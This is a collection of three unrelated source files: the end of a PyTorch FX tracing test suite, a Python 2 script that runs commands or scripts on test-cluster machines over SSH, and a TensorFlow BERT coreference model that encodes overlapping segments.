"threshold_": BUILT_IN_FUNC,
"adaptive_avg_pool2d": LEN_ERROR,
"adaptive_avg_pool3d": LEN_ERROR,
"adaptive_max_pool2d_with_indices": LEN_ERROR,
"adaptive_max_pool3d_with_indices": LEN_ERROR,
"instance_norm": CONTROL_FLOW,
"pad": LEN_ERROR,
"adaptive_max_pool1d": PROXY_ITERABLE,
"adaptive_max_pool2d": PROXY_ITERABLE,
"adaptive_max_pool3d": PROXY_ITERABLE,
"fractional_max_pool2d": PROXY_ITERABLE,
"fractional_max_pool3d": PROXY_ITERABLE,
"max_pool1d": PROXY_ITERABLE,
"max_pool2d": PROXY_ITERABLE,
"max_pool3d": PROXY_ITERABLE,
"group_norm": PROXY_ITERATED,
"lp_pool2d": PROXY_ITERATED,
"max_unpool1d": PROXY_ITERATED,
"max_unpool2d": PROXY_ITERATED,
"max_unpool3d": PROXY_ITERATED,
"adaptive_max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"fractional_max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"hardshrink": ARG_TYPE_MISMATCH,
"layer_norm": ARG_TYPE_MISMATCH,
"lp_pool1d": ARG_TYPE_MISMATCH,
"max_pool1d_with_indices": ARG_TYPE_MISMATCH,
"max_pool2d_with_indices": ARG_TYPE_MISMATCH,
"max_pool3d_with_indices": ARG_TYPE_MISMATCH,
"pairwise_distance": ARG_TYPE_MISMATCH,
"affine_grid": CONTROL_FLOW,
"alpha_dropout": CONTROL_FLOW,
"batch_norm": CONTROL_FLOW,
"binary_cross_entropy": CONTROL_FLOW,
"binary_cross_entropy_with_logits": CONTROL_FLOW,
"celu": CONTROL_FLOW,
"cosine_embedding_loss": CONTROL_FLOW,
"cross_entropy": CONTROL_FLOW,
"ctc_loss": CONTROL_FLOW,
"dropout": CONTROL_FLOW,
"dropout2d": CONTROL_FLOW,
"dropout3d": CONTROL_FLOW,
"elu": CONTROL_FLOW,
"embedding": CONTROL_FLOW,
"embedding_bag": CONTROL_FLOW,
"feature_alpha_dropout": CONTROL_FLOW,
"fold": CONTROL_FLOW,
"gaussian_nll_loss": CONTROL_FLOW,
"glu": CONTROL_FLOW,
"grid_sample": CONTROL_FLOW,
"gumbel_softmax": CONTROL_FLOW,
"hardsigmoid": CONTROL_FLOW,
"hardswish": CONTROL_FLOW,
"hardtanh": CONTROL_FLOW,
"hinge_embedding_loss": CONTROL_FLOW,
"huber_loss": CONTROL_FLOW,
"interpolate": CONTROL_FLOW,
"kl_div": CONTROL_FLOW,
"l1_loss": CONTROL_FLOW,
"leaky_relu": CONTROL_FLOW,
"local_response_norm": CONTROL_FLOW,
"margin_ranking_loss": CONTROL_FLOW,
"mse_loss": CONTROL_FLOW,
"multi_head_attention_forward": CONTROL_FLOW,
"multi_margin_loss": CONTROL_FLOW,
"multilabel_margin_loss": CONTROL_FLOW,
"multilabel_soft_margin_loss": CONTROL_FLOW,
"nll_loss": CONTROL_FLOW,
"poisson_nll_loss": CONTROL_FLOW,
"relu": CONTROL_FLOW,
"relu6": CONTROL_FLOW,
"rrelu": CONTROL_FLOW,
"selu": CONTROL_FLOW,
"silu": CONTROL_FLOW,
"mish": CONTROL_FLOW,
"smooth_l1_loss": CONTROL_FLOW,
"soft_margin_loss": CONTROL_FLOW,
"threshold": CONTROL_FLOW,
"triplet_margin_loss": CONTROL_FLOW,
"triplet_margin_with_distance_loss": CONTROL_FLOW,
"unfold": CONTROL_FLOW,
"upsample": CONTROL_FLOW,
"upsample_bilinear": INTERPOLATE_ARGS_CONFLICT,
"upsample_nearest": INTERPOLATE_ARGS_CONFLICT,
"normalize" : MUTABLE,
}
# List of nn.functionals with Tensor inputs but without type annotations
FUNCTIONALS_WITHOUT_ANNOTATION = (
"adaptive_max_pool1d",
"adaptive_max_pool2d",
"adaptive_max_pool3d",
"fractional_max_pool2d",
"fractional_max_pool3d",
"max_pool1d",
"max_pool2d",
"max_pool3d",
"gaussian_nll_loss",
"upsample",
"upsample_bilinear",
"upsample_nearest",
)
# Inconsistent behavior between Python 3.8 and other Python versions:
# - Python 3.8+: Re-raise internal exception like `PROXY_ITERATED`
# - Other Python: Raise `argument of type 'Proxy' is not iterable` due to the same
# internal exception above
# Use the following map to override the expected exception for Python 3.8
UNTRACEABLE_FUNCTIONALS_PY38 = {
"adaptive_max_pool1d": PROXY_ITERATED,
"adaptive_max_pool2d": PROXY_ITERATED,
"adaptive_max_pool3d": PROXY_ITERATED,
"fractional_max_pool2d": PROXY_ITERATED,
"fractional_max_pool3d": PROXY_ITERATED,
"max_pool1d": PROXY_ITERATED,
"max_pool2d": PROXY_ITERATED,
"max_pool3d": PROXY_ITERATED,
"group_norm": LEN_ERROR
}
@classmethod
def _get_functional(cls):
functional_list = []
for f in dir(torch.nn.functional):
if not f.islower():
continue
# Ignore internal functions
if f.startswith('_'):
continue
# Ignore supporting functions
if f in cls.IGNORE_FUNCS:
continue
fn = getattr(torch.nn.functional, f)
# Ignore non-callable objects such as modules
if not isinstance(fn, Callable):
continue
if f not in cls.FUNCTIONALS_WITHOUT_ANNOTATION:
try:
sig = inspect.signature(fn)
has_tensor_arg = False
for arg, param in sig.parameters.items():
if isinstance(param.annotation, type) and issubclass(param.annotation, torch.Tensor):
has_tensor_arg = True
if not has_tensor_arg:
continue
# inspect.signature raises ValueError when the object has no signature or is unsupported
except ValueError:
pass
functional_list.append((f, fn))
return functional_list
@classmethod
def generate_test_func(cls, func_name, fn):
def functional_test(self):
if func_name in self.UNTRACEABLE_FUNCTIONALS_PY38 and \
sys.version_info >= (3, 8) and sys.version_info < (3, 10):
exc, err = self.UNTRACEABLE_FUNCTIONALS_PY38[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
elif func_name in self.UNTRACEABLE_FUNCTIONALS:
exc, err = self.UNTRACEABLE_FUNCTIONALS[func_name]
with self.assertRaisesRegex(exc, err):
symbolic_trace(fn)
else:
symbolic_trace(fn)
return functional_test
@classmethod
def generate_tests(cls):
functional_list = cls._get_functional()
for func_name, fn in functional_list:
test_name = "test_nn_functional_" + func_name
functional_test = cls.generate_test_func(func_name, fn)
setattr(cls, test_name, functional_test)
@classmethod
def setUpClass(cls):
def no(*args, **kwargs):
return False
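# Patching has_torch_function* to this stub likely forces the functionals to
# take their ordinary Python code path (instead of dispatching through
# __torch_function__), so tracing exercises their real bodies.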
for name in cls.TO_PATCH.keys():
cls.TO_PATCH[name] = getattr(torch.nn.functional, name)
setattr(torch.nn.functional, name, no)
@classmethod
def tearDownClass(cls):
for name in cls.TO_PATCH.keys():
setattr(torch.nn.functional, name, cls.TO_PATCH[name])
TestFunctionalTracing.generate_tests()
instantiate_device_type_tests(TestOperatorSignatures, globals())
@skipIfNoTorchVision
class TestVisionTracing(JitTestCase):
def setUp(self):
# Checking for mutable operations while tracing is feature-flagged;
# enable it in testing but not by default.
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
PROXY_ITERATED = (TraceError, r"Proxy object cannot be iterated")
INCONSISTENT_TYPE = (
RuntimeError,
r"Return value was annotated as having type __torch__.torchvision.models[.\w]+ but is actually of type Tensor"
)
UNTRACEABLE_MODELS = {
"fasterrcnn_resnet50_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_320_fpn": PROXY_ITERATED,
"fasterrcnn_mobilenet_v3_large_fpn": PROXY_ITERATED,
"maskrcnn_resnet50_fpn": PROXY_ITERATED,
"keypointrcnn_resnet50_fpn": PROXY_ITERATED,
"retinanet_resnet50_fpn": PROXY_ITERATED,
}
UNSCRIPTABLE_MODELS = {
"googlenet": INCONSISTENT_TYPE,
"inception_v3": INCONSISTENT_TYPE,
}
output_transform = {
"fcn_resnet50": lambda x: x["out"],
"fcn_resnet101": lambda x: x["out"],
"deeplabv3_resnet50": lambda x: x["out"],
"deeplabv3_resnet101": lambda x: x["out"],
"deeplabv3_mobilenet_v3_large": lambda x: x["out"],
"lraspp_mobilenet_v3_large": lambda x: x["out"],
"fasterrcnn_resnet50_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_fpn": lambda x: x[1],
"fasterrcnn_mobilenet_v3_large_320_fpn": lambda x: x[1],
"maskrcnn_resnet50_fpn": lambda x: x[1],
"keypointrcnn_resnet50_fpn": lambda x: x[1],
"retinanet_resnet50_fpn": lambda x: x[1],
}
@classmethod
def generate_test_fn(cls, name, model_fn, x, kwargs):
def run_test(self):
model = model_fn(**kwargs)
model = model.eval()
if name in self.UNTRACEABLE_MODELS:
exc, err = self.UNTRACEABLE_MODELS[name]
with self.assertRaisesRegex(exc, err):
graph = symbolic_trace(model)
else:
out_transform = self.output_transform.get(name, lambda x: x)
graph : torch.fx.GraphModule = symbolic_trace(model)
a = out_transform(model(x))
b = out_transform(graph(x))
self.assertEqual(a, b)
if name in self.UNSCRIPTABLE_MODELS:
exc, err = self.UNSCRIPTABLE_MODELS[name]
with self.assertRaisesRegex(exc, err):
script = torch.jit.script(graph)
else:
script = torch.jit.script(graph)
c = out_transform(script(x))
self.assertEqual(a, c)
return run_test
@classmethod
def generate_classification_tests(cls):
for k, v in torchvision_models.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_' + k
x = torch.rand(1, 3, 299, 299) if k in ['inception_v3'] else torch.rand(1, 3, 224, 224)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_segmentation_tests(cls):
for k, v in torchvision_models.segmentation.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_segmentation_' + k
x = torch.rand(1, 3, 32, 32)
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_detection_tests(cls):
for k, v in torchvision_models.detection.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_detection_' + k
x = [torch.rand(3, 300, 300)]
kwargs = dict(num_classes=10, pretrained_backbone=False)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_video_tests(cls):
for k, v in torchvision_models.video.__dict__.items():
if callable(v) and k[0].lower() == k[0] and k[0] != "_":
test_name = 'test_torchvision_models_video_' + k
x = torch.rand(1, 3, 4, 112, 112)
kwargs = dict(num_classes=50)
model_test = cls.generate_test_fn(k, v, x, kwargs)
setattr(cls, test_name, model_test)
@classmethod
def generate_tests(cls):
cls.generate_classification_tests()
cls.generate_detection_tests()
cls.generate_segmentation_tests()
cls.generate_video_tests()
if HAS_TORCHVISION:
TestVisionTracing.generate_tests()
if __name__ == '__main__':
run_tests()
|
ssh.py
|
#!/usr/bin/python
import getopt
import sys
from threading import Thread
from datetime import datetime
import uuid
sys.path = [".", "lib"] + sys.path
from platform_utils.remote.remote_util import \
RemoteMachineShellConnection
import TestInput
import logging.config
logging.config.fileConfig("scripts.logging.conf")
log = logging.getLogger()
def usage(error=None):
print """\
Syntax: ssh.py [options] [command]
Options:
-p <key=val,...> Comma-separated key=value info.
-i <file> Path to .ini file containing cluster information.
Available keys:
script=<file> Local script to run
parallel=true Run the command in parallel on all machines
Examples:
ssh.py -i /tmp/ubuntu.ini -p script=/tmp/set_date.sh
ssh.py -i /tmp/ubuntu.ini -p parallel=false ls -l /tmp/core*
"""
sys.exit(error)
class CommandRunner(object):
def __init__(self, server, command):
self.server = server
self.command = command
def run(self):
remote_client = RemoteMachineShellConnection(self.server)
output, error = remote_client.execute_command(self.command)
print self.server.ip
print "\n".join(output)
print "\n".join(error)
class ScriptRunner(object):
def __init__(self, server, script):
self.server = server
with open(script) as f:
self.script_content = f.read()
self.script_name = "/tmp/" + str(uuid.uuid4())
def run(self):
remote_client = RemoteMachineShellConnection(self.server)
remote_client.create_file(self.script_name, self.script_content)
output, error = remote_client.execute_command(
"chmod 777 {0} ; {0} ; rm -f {0}".format(self.script_name))
print self.server.ip
print "\n".join(output)
print "\n".join(error)
class RemoteJob(object):
def sequential_remote(self, input):
remotes = []
params = input.test_params
for server in input.servers:
if "script" in params:
remotes.append(ScriptRunner(server, params["script"]))
if "command" in params:
remotes.append(CommandRunner(server, params["command"]))
for remote in remotes:
try:
remote.run()
except Exception as ex:
print "unable to complete the job: {0}".format(ex)
def parallel_remote(self, input):
remotes = []
params = input.test_params
for server in input.servers:
if "script" in params:
remotes.append(ScriptRunner(server, params["script"]))
if "command" in params:
remotes.append(CommandRunner(server, params["command"]))
remote_threads = []
for remote in remotes:
remote_threads.append(Thread(target=remote.run))
for remote_thread in remote_threads:
remote_thread.start()
for remote_thread in remote_threads:
remote_thread.join()
def main():
try:
(opts, args) = getopt.getopt(sys.argv[1:], 'hi:p:', [])
for o, a in opts:
if o == "-h":
usage()
input = TestInput.TestInputParser.get_test_input(sys.argv)
if not input.servers:
usage(
"ERROR: no servers specified. Please use the -i "
"parameter.")
except IndexError:
usage()
except getopt.GetoptError, error:
usage("ERROR: " + str(error))
command_offset = 3
if "-p" in sys.argv[:4]:
command_offset += 2
command = " ".join(sys.argv[command_offset:])
if command:
input.test_params["command"] = command
if input.param("parallel", True):
# workaround for a Python 2.6 bug when using strptime with threads
datetime.strptime("30 Nov 00", "%d %b %y")
RemoteJob().parallel_remote(input)
else:
RemoteJob().sequential_remote(input)
if __name__ == "__main__":
main()
def create_log_file(log_config_file_name, log_file_name, level):
tmpl_log_file = open("jython.logging.conf")
log_file = open(log_config_file_name, "w")
log_file.truncate()
for line in tmpl_log_file:
newline = line.replace("@@LEVEL@@", level)
newline = newline.replace("@@FILENAME@@",
log_file_name.replace('\\', '/'))
log_file.write(newline)
log_file.close()
tmpl_log_file.close()
|
overlap.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import random
import math
import json
import threading
import numpy as np
import tensorflow as tf
import util
import coref_ops
import conll
import metrics
import optimization
from bert import tokenization
from bert import modeling
from pytorch_to_tf import load_from_pytorch_checkpoint
class CorefModel(object):
def __init__(self, config):
self.config = config
self.subtoken_maps = {}
self.max_segment_len = config['max_segment_len']
self.max_span_width = config["max_span_width"]
self.mask_perc = config['mask_percentage'] #MODIFIED
self.n_placeholders = 1 #MODIFIED
self.genres = { g:i for i,g in enumerate(config["genres"]) }
self.eval_data = None # Load eval data lazily.
self.bert_config = modeling.BertConfig.from_json_file(config["bert_config_file"])
self.sep = 102
self.cls = 101
self.tokenizer = tokenization.FullTokenizer(
vocab_file=config['vocab_file'], do_lower_case=False)
input_props = []
input_props.append((tf.int32, [None, None])) # input_ids.
input_props.append((tf.int32, [None, None])) # input_mask
input_props.append((tf.int32, [None, None])) # overlap_ids.
input_props.append((tf.int32, [None, None])) # overlap_mask
input_props.append((tf.int32, [None])) # Text lengths.
input_props.append((tf.int32, [None, None])) # Speaker IDs.
input_props.append((tf.int32, [])) # Genre.
input_props.append((tf.bool, [])) # Is training.
input_props.append((tf.int32, [None])) # Gold starts.
input_props.append((tf.int32, [None])) # Gold ends.
input_props.append((tf.int32, [None])) # Cluster ids.
input_props.append((tf.int32, [None])) # Sentence Map
self.queue_input_tensors = [tf.placeholder(dtype, shape) for dtype, shape in input_props]
dtypes, shapes = zip(*input_props)
queue = tf.PaddingFIFOQueue(capacity=10, dtypes=dtypes, shapes=shapes)
self.enqueue_op = queue.enqueue(self.queue_input_tensors)
self.input_tensors = queue.dequeue()
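# The padding FIFO queue decouples example preparation from training:
# start_enqueue_thread tensorizes examples on a background thread and feeds
# them in, while the training graph dequeues from here.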
self.predictions, self.loss = self.get_predictions_and_loss(*self.input_tensors)
# BERT setup: build the checkpoint assignment map and load pretrained weights into the encoder
tvars = tf.trainable_variables()
assignment_map, initialized_variable_names = modeling.get_assignment_map_from_checkpoint(tvars, config['tf_checkpoint'])
init_from_checkpoint = tf.train.init_from_checkpoint if config['init_checkpoint'].endswith('ckpt') else load_from_pytorch_checkpoint
init_from_checkpoint(config['init_checkpoint'], assignment_map)
print("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
# tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
# init_string)
print(" name = %s, shape = %s%s" % (var.name, var.shape, init_string))
num_train_steps = int(
self.config['num_docs'] * self.config['num_epochs'])
num_warmup_steps = int(num_train_steps * 0.1)
self.global_step = tf.train.get_or_create_global_step()
self.train_op = optimization.create_custom_optimizer(tvars,
self.loss, self.config['bert_learning_rate'], self.config['task_learning_rate'],
num_train_steps, num_warmup_steps, False, self.global_step, freeze=-1)
def start_enqueue_thread(self, session):
print('Loading data')
with open(self.config["train_path"]) as f:
train_examples = [json.loads(jsonline) for jsonline in f.readlines()]
def _enqueue_loop():
while True:
random.shuffle(train_examples)
if self.config['single_example']:
for example in train_examples:
example = add_masks(example, mask_profile = 'percentage', all_profiles = False, n_masks_profile = 1, skip_first_mention = False,
perc_mask=self.mask_perc, n_placeholders = self.n_placeholders)
tensorized_example = self.tensorize_example(example[0], is_training=True)
feed_dict = dict(zip(self.queue_input_tensors, tensorized_example))
session.run(self.enqueue_op, feed_dict=feed_dict)
else:
examples = []
for example in train_examples:
example = add_masks(example, mask_profile = 'percentage', all_profiles = False, n_masks_profile = 1, skip_first_mention = False,
perc_mask=self.mask_perc, n_placeholders = self.n_placeholders)
tensorized = self.tensorize_example(example[0], is_training=True)
if type(tensorized) is not list:
tensorized = [tensorized]
examples += tensorized
random.shuffle(examples)
print('num examples', len(examples))
for example in examples:
feed_dict = dict(zip(self.queue_input_tensors, example))
session.run(self.enqueue_op, feed_dict=feed_dict)
enqueue_thread = threading.Thread(target=_enqueue_loop)
enqueue_thread.daemon = True
enqueue_thread.start()
def restore(self, session):
# Restore all global variables from the checkpoint (no variables are filtered out here).
vars_to_restore = [v for v in tf.global_variables() ]
saver = tf.train.Saver(vars_to_restore)
checkpoint_path = os.path.join(self.config["log_dir"], "model.max.ckpt")
print("Restoring from {}".format(checkpoint_path))
session.run(tf.global_variables_initializer())
saver.restore(session, checkpoint_path)
def tensorize_mentions(self, mentions):
if len(mentions) > 0:
starts, ends = zip(*mentions)
else:
starts, ends = [], []
return np.array(starts), np.array(ends)
def tensorize_span_labels(self, tuples, label_dict):
if len(tuples) > 0:
starts, ends, labels = zip(*tuples)
else:
starts, ends, labels = [], [], []
return np.array(starts), np.array(ends), np.array([label_dict[c] for c in labels])
def get_speaker_dict(self, speakers):
speaker_dict = {'UNK': 0, '[SPL]': 1}
for s in speakers:
if s not in speaker_dict and len(speaker_dict) < self.config['max_num_speakers']:
speaker_dict[s] = len(speaker_dict)
return speaker_dict
def tensorize_example(self, example, is_training):
clusters = example["clusters"]
gold_mentions = sorted(tuple(m) for m in util.flatten(clusters))
gold_mention_map = {m:i for i,m in enumerate(gold_mentions)}
cluster_ids = np.zeros(len(gold_mentions))
for cluster_id, cluster in enumerate(clusters):
for mention in cluster:
cluster_ids[gold_mention_map[tuple(mention)]] = cluster_id + 1
sentences = example["sentences"]
#sentences = [sentence[1:-1] for sentence in sentences]
num_words = sum(len(s) for s in sentences)
speakers = example["speakers"]
# assert num_words == len(speakers), (num_words, len(speakers))
speaker_dict = self.get_speaker_dict(util.flatten(speakers))
sentence_map = example['sentence_map']
max_sentence_length = self.max_segment_len #270 #max(len(s) for s in sentences)
max_len = max(len(s) + 2 for s in sentences) # CHANGED: +2 for the [CLS]/[SEP] tokens added to each segment below
if max_len > max_sentence_length:
max_sentence_length = max_len
text_len = np.array([len(s) for s in sentences])
input_ids, input_mask, speaker_ids, prev_overlap = [], [], [], []
overlap_ids, overlap_mask = [], []
half = self.max_segment_len // 2
prev_tokens_per_seg = []
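# Each segment is encoded twice: once as-is ([CLS] sentence [SEP]) and once as
# an "overlap" window built from the second half of the previous segment plus
# the first half of the current one, so tokens near segment boundaries also see
# context from the neighbouring segment (behaviour inferred from the loop below).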
for i, (sentence, speaker) in enumerate(zip(sentences, speakers)):
prev_tokens_per_seg += [len(prev_overlap)]
overlap_words = ['[CLS]'] + prev_overlap + sentence[:half] + ['[SEP]']
prev_overlap = sentence[half:]
sentence = ['[CLS]'] + sentence + ['[SEP]']
sent_input_ids = self.tokenizer.convert_tokens_to_ids(sentence)
sent_input_mask = [1] * len(sent_input_ids)
sent_speaker_ids = [speaker_dict.get(s, 0) for s in ['##'] + speaker + ['##']]
while len(sent_input_ids) < max_sentence_length:
sent_input_ids.append(0)
sent_input_mask.append(0)
sent_speaker_ids.append(0)
overlap_input_ids = self.tokenizer.convert_tokens_to_ids(overlap_words)
overlap_input_mask = [1] * len(overlap_input_ids)
while len(overlap_input_ids) < max_sentence_length:
overlap_input_ids.append(0)
overlap_input_mask.append(0)
input_ids.append(sent_input_ids)
speaker_ids.append(sent_speaker_ids)
input_mask.append(sent_input_mask)
overlap_ids.append(overlap_input_ids)
overlap_mask.append(overlap_input_mask)
overlap_words = ['[CLS]'] + prev_overlap + ['[SEP]']
overlap_input_ids = self.tokenizer.convert_tokens_to_ids(overlap_words)
overlap_input_mask = [1] * len(overlap_input_ids)
prev_tokens_per_seg += [len(prev_overlap)]
while len(overlap_input_ids) < max_sentence_length:
overlap_input_ids.append(0)
overlap_input_mask.append(0)
overlap_ids.append(overlap_input_ids)
overlap_mask.append(overlap_input_mask)
input_ids = np.array(input_ids)
input_mask = np.array(input_mask)
speaker_ids = np.array(speaker_ids)
overlap_ids = np.array(overlap_ids)
overlap_mask = np.array(overlap_mask)
assert num_words == (np.sum(input_mask) - 2*np.shape(input_mask)[0]), (num_words, np.sum(input_mask))
assert num_words == (np.sum(overlap_mask) - 2*np.shape(overlap_mask)[0]), (num_words, np.sum(overlap_mask), np.shape(overlap_mask))
doc_key = example["doc_key"]
self.subtoken_maps[doc_key] = example["subtoken_map"]
genre = self.genres[doc_key[:2]]
gold_starts, gold_ends = self.tensorize_mentions(gold_mentions)
example_tensors = (input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map)
if is_training and len(sentences) > self.config["max_training_sentences"]:
return self.truncate_example(* (example_tensors + (prev_tokens_per_seg, )))
else:
return example_tensors
def truncate_example(self, input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map, prev_tokens_per_seg, sentence_offset=None):
max_training_sentences = self.config["max_training_sentences"]
num_sentences = input_ids.shape[0]
assert num_sentences > max_training_sentences
sentence_offset = random.randint(0, num_sentences - max_training_sentences) if sentence_offset is None else sentence_offset
word_offset = text_len[:sentence_offset].sum()
num_words = text_len[sentence_offset:sentence_offset + max_training_sentences].sum()
input_ids = input_ids[sentence_offset:sentence_offset + max_training_sentences, :]
input_mask = input_mask[sentence_offset:sentence_offset + max_training_sentences, :]
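# The overlap view keeps one extra segment (hence the +1 slices below) and its
# boundary rows are patched so that, after truncation, it still covers exactly
# the same tokens as the original segments (see the assert on token counts).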
overlap_ids = overlap_ids[sentence_offset:sentence_offset + max_training_sentences + 1, :]
overlap_mask = overlap_mask[sentence_offset:sentence_offset + max_training_sentences + 1, :]
overlap_ids[-1, 1 + prev_tokens_per_seg[sentence_offset + max_training_sentences]] = self.sep
overlap_ids[-1, 2 + prev_tokens_per_seg[sentence_offset + max_training_sentences]:] = 0
overlap_mask[-1, 2 + prev_tokens_per_seg[sentence_offset + max_training_sentences]:] = 0
overlap_mask[0, 1: 1 + prev_tokens_per_seg[sentence_offset ]] = 0
assert num_words == overlap_mask.sum() - 2 * np.shape(overlap_ids)[0], (num_words, overlap_mask.sum(), text_len)
speaker_ids = speaker_ids[sentence_offset:sentence_offset + max_training_sentences, :]
text_len = text_len[sentence_offset:sentence_offset + max_training_sentences]
sentence_map = sentence_map[word_offset: word_offset + num_words]
gold_spans = np.logical_and(gold_ends >= word_offset, gold_starts < word_offset + num_words)
gold_starts = gold_starts[gold_spans] - word_offset
gold_ends = gold_ends[gold_spans] - word_offset
cluster_ids = cluster_ids[gold_spans]
return input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map
def get_candidate_labels(self, candidate_starts, candidate_ends, labeled_starts, labeled_ends, labels):
same_start = tf.equal(tf.expand_dims(labeled_starts, 1), tf.expand_dims(candidate_starts, 0)) # [num_labeled, num_candidates]
same_end = tf.equal(tf.expand_dims(labeled_ends, 1), tf.expand_dims(candidate_ends, 0)) # [num_labeled, num_candidates]
same_span = tf.logical_and(same_start, same_end) # [num_labeled, num_candidates]
candidate_labels = tf.matmul(tf.expand_dims(labels, 0), tf.to_int32(same_span)) # [1, num_candidates]
candidate_labels = tf.squeeze(candidate_labels, 0) # [num_candidates]
return candidate_labels
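# A small worked example (hypothetical values) of the exact-match labelling above:
# with gold spans labeled_starts=[0, 5], labeled_ends=[2, 6], labels=[1, 2] and
# candidates candidate_starts=[0, 0, 5], candidate_ends=[1, 2, 6], only the
# candidates (0, 2) and (5, 6) match a gold span exactly, so the returned
# candidate_labels are [0, 1, 2] (0 marks "no matching gold span").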
def get_dropout(self, dropout_rate, is_training):
return 1 - (tf.to_float(is_training) * dropout_rate)
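# Note: this returns the keep probability used by tf.nn.dropout: 1.0 at eval
# time and (1 - dropout_rate) during training.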
def coarse_to_fine_pruning(self, top_span_emb, top_span_mention_scores, c):
k = util.shape(top_span_emb, 0)
top_span_range = tf.range(k) # [k]
antecedent_offsets = tf.expand_dims(top_span_range, 1) - tf.expand_dims(top_span_range, 0) # [k, k]
antecedents_mask = antecedent_offsets >= 1 # [k, k]
fast_antecedent_scores = tf.expand_dims(top_span_mention_scores, 1) + tf.expand_dims(top_span_mention_scores, 0) # [k, k]
fast_antecedent_scores += tf.log(tf.to_float(antecedents_mask)) # [k, k]
fast_antecedent_scores += self.get_fast_antecedent_scores(top_span_emb) # [k, k]
if self.config['use_prior']:
antecedent_distance_buckets = self.bucket_distance(antecedent_offsets) # [k, k]
distance_scores = util.projection(tf.nn.dropout(tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]), self.dropout), 1, initializer=tf.truncated_normal_initializer(stddev=0.02)) #[10, 1]
antecedent_distance_scores = tf.gather(tf.squeeze(distance_scores, 1), antecedent_distance_buckets) # [k, k]
fast_antecedent_scores += antecedent_distance_scores
_, top_antecedents = tf.nn.top_k(fast_antecedent_scores, c, sorted=False) # [k, c]
top_antecedents_mask = util.batch_gather(antecedents_mask, top_antecedents) # [k, c]
top_fast_antecedent_scores = util.batch_gather(fast_antecedent_scores, top_antecedents) # [k, c]
top_antecedent_offsets = util.batch_gather(antecedent_offsets, top_antecedents) # [k, c]
return top_antecedents, top_antecedents_mask, top_fast_antecedent_scores, top_antecedent_offsets
def combine_passes(self, original_doc, input_ids, input_mask, overlap_doc, overlap_ids, overlap_mask):
overlap_mask, input_mask = tf.equal(overlap_mask, 1), tf.equal(input_mask, 1)
org_content_mask = tf.logical_and(input_mask, tf.logical_and(tf.not_equal(input_ids, self.cls), tf.not_equal(input_ids, self.sep)))
overlap_content_mask = tf.logical_and(overlap_mask, tf.logical_and(tf.not_equal(overlap_ids, self.cls), tf.not_equal(overlap_ids, self.sep)))
flat_org_doc = self.flatten_emb_by_sentence(original_doc, org_content_mask)
flat_overlap_doc = self.flatten_emb_by_sentence(overlap_doc, overlap_content_mask)
with tf.variable_scope("combo"):
f = tf.sigmoid(util.projection(tf.concat([flat_org_doc, flat_overlap_doc], -1), util.shape(flat_org_doc, -1))) # [n, emb]
combo = f * flat_org_doc + (1 - f) * flat_overlap_doc
return combo, org_content_mask
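# Note: the sigmoid gate f above is computed per token from both encodings, so
# combo interpolates token-by-token between the original-segmentation pass
# (f close to 1) and the overlapping-segmentation pass (f close to 0).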
def get_predictions_and_loss(self, input_ids, input_mask, overlap_ids, overlap_mask, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, cluster_ids, sentence_map):
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
use_one_hot_embeddings=False,
scope='bert')
original_doc = model.get_sequence_output()
model = modeling.BertModel(
config=self.bert_config,
is_training=is_training,
input_ids=overlap_ids,
input_mask=overlap_mask,
use_one_hot_embeddings=False,
scope='bert')
overlap_doc = model.get_sequence_output()
self.dropout = self.get_dropout(self.config["dropout_rate"], is_training)
num_sentences = tf.shape(input_ids)[0]
max_sentence_length = tf.shape(input_mask)[1] - 2
mention_doc, org_content_mask = self.combine_passes(original_doc, input_ids, input_mask, overlap_doc, overlap_ids, overlap_mask)
num_words = util.shape(mention_doc, 0)
antecedent_doc = mention_doc
# mask out cross-sentence candidates
flattened_sentence_indices = sentence_map
candidate_starts = tf.tile(tf.expand_dims(tf.range(num_words), 1), [1, self.max_span_width]) # [num_words, max_span_width]
candidate_ends = candidate_starts + tf.expand_dims(tf.range(self.max_span_width), 0) # [num_words, max_span_width]
candidate_start_sentence_indices = tf.gather(flattened_sentence_indices, candidate_starts) # [num_words, max_span_width]
candidate_end_sentence_indices = tf.gather(flattened_sentence_indices, tf.minimum(candidate_ends, num_words - 1)) # [num_words, max_span_width]
candidate_mask = tf.logical_and(candidate_ends < num_words, tf.equal(candidate_start_sentence_indices, candidate_end_sentence_indices)) # [num_words, max_span_width]
flattened_candidate_mask = tf.reshape(candidate_mask, [-1]) # [num_words * max_span_width]
